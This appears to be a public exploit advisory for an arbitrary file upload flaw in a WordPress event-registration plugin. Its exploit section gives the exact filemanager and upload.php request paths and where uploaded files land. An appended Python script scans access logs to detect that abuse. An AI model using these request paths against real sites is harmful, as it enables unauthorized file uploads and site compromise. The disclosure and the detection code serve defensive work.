# Exploit Title : WordPress Event-Registration Plugins 5.43 Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/03/2020
# Vendor Homepage : wp-event-organiser.com
# Software Links :
captainform.com/wordpress-event-registration-plugin/
wordpress.org/plugins/registrations-for-the-events-calendar/
edgetechweb.com
eventregistrationpro.com
# Software Version :
Requires at least: 2.0.2
Tested up to: 3.0.2
Software Affected Version : 5.42 - 5.43
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity :
packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description About Software :
*****************************
This plugin is designed to allow you to take online registrations for events and classes.
Supports PayPal, Google Pay, MonsterPay or Authorize.net online payment sites for online collection of event fees.
This WordPress plugin is designed to run on a WordPress website and provide registration for events, classes, or parties.
It allows you to capture the registering person's contact information and any additional information you request to a database and provides an association to an events database.
It provides the ability to send the registrant to either a PayPal, Google Pay, MonsterPay, or Authorize.net online payment site for online collection of event fees.
Additionally it allows support for check and cash payments.
Optional Captcha field on registration form.
Detailed payment management system to track and record event payments.
Reporting features provide an export list(s) of events, attendees, payments in Excel or CSV.
Events can be created in an Excel spreadsheet and uploaded via the event upload tool.
Dashboard widget allows for quick reference to events from the dashboard.
Inline menu navigation allows for ease of use.
== Installation ==
1. After unzipping, upload everything in the `Events Registration` folder to your `/wp-content/plugins/` directory (preserving directory structure).
2. Activate the plugin through the 'Plugins' menu in WordPress.
3. Go to the Event Registration Menu and Configure Organization and enter your company info - note you will need a PayPal id if you plan on accepting PayPal payments.
4. Go to the Event Setup and create a new event, make sure you select 'make active'.
5. Create a new page (not post) on your site. Put `{EVENTREGIS}` in it on a line by itself.
6. Note: if you are upgrading from a previous version please back up your data prior to upgrade.
####################################################################
# Impact :
***********
WordPress Event-Registration Plugins 5.43 is prone to a vulnerability that lets attackers upload arbitrary files because it fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/Select%20file&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/upload.php?path=/home/[DIRECTORY-NAME-HERE]/public_html/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files
Valid extensions: gif, jpg, htm, html, pdf, zip
Max upload size: 10 MB
Directory File Path :
**********************
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files/[YOURFILENAME].html
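Added detection example (not part of this advisory or of the plugin): the Python below scans web-server access-log lines for requests to the filemanager endpoints listed above and for .htm/.html content served back out of its files/ directory, which is the part of the accepted-extension list a browser renders as site-origin content. The combined log format, the sample lines and the severity labels are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Paths taken from the advisory above; detection logic is constructed for this example.
PLUGIN_DIR = "/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/"
UPLOAD_ENDPOINTS = {PLUGIN_DIR + "upload.php", PLUGIN_DIR + "frameset.php"}
FILES_DIR = PLUGIN_DIR + "files/"
# Of the extensions the advisory says upload.php accepts (gif, jpg, htm, html, pdf, zip),
# these are rendered inline by the browser when fetched from files/.
RENDERED_EXT = {"htm", "html"}

# Apache/nginx "combined" log format (assumption about the deployment).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def classify(line):
    """Return (severity, reason) for one access-log line, or None if not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = urlsplit(m["target"]).path
    if path in UPLOAD_ENDPOINTS:
        # A 200 from upload.php means the endpoint answered instead of being blocked.
        sev = "high" if path.endswith("upload.php") and m["status"] == "200" else "medium"
        return sev, f"{m['method']} {path} -> {m['status']} from {m['ip']}"
    if path.startswith(FILES_DIR):
        ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
        if ext in RENDERED_EXT:
            return "high", f"served uploaded .{ext} from files/ to {m['ip']}"
        return "low", f"served {path.rsplit('/', 1)[-1]} from files/ to {m['ip']}"
    return None

def scan(lines):
    """Run classify() over every line; returns the list of (severity, reason) hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Mar/2020:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 4123',
    '203.0.113.5 - - [30/Mar/2020:10:01:09 +0000] "GET ' + PLUGIN_DIR + 'frameset.php?a=b&js=mcFileManager.insertFileToForm&initial_path=mce_clear HTTP/1.1" 200 2210',
    '203.0.113.5 - - [30/Mar/2020:10:01:15 +0000] "POST ' + PLUGIN_DIR + 'upload.php?path=/home/example/public_html' + PLUGIN_DIR + 'files HTTP/1.1" 200 88',
    '198.51.100.9 - - [30/Mar/2020:10:02:40 +0000] "GET ' + FILES_DIR + 'test.html HTTP/1.1" 200 512',
    '198.51.100.9 - - [30/Mar/2020:10:02:41 +0000] "GET ' + FILES_DIR + 'logo.jpg HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for sev, reason in scan(SAMPLE_LOG):
        print(f"[{sev}] {reason}")
```

Feed real access logs in line by line; a `high` on upload.php followed by a `high` served .html from files/ is the sequence to alert on and to remove the file for.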
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################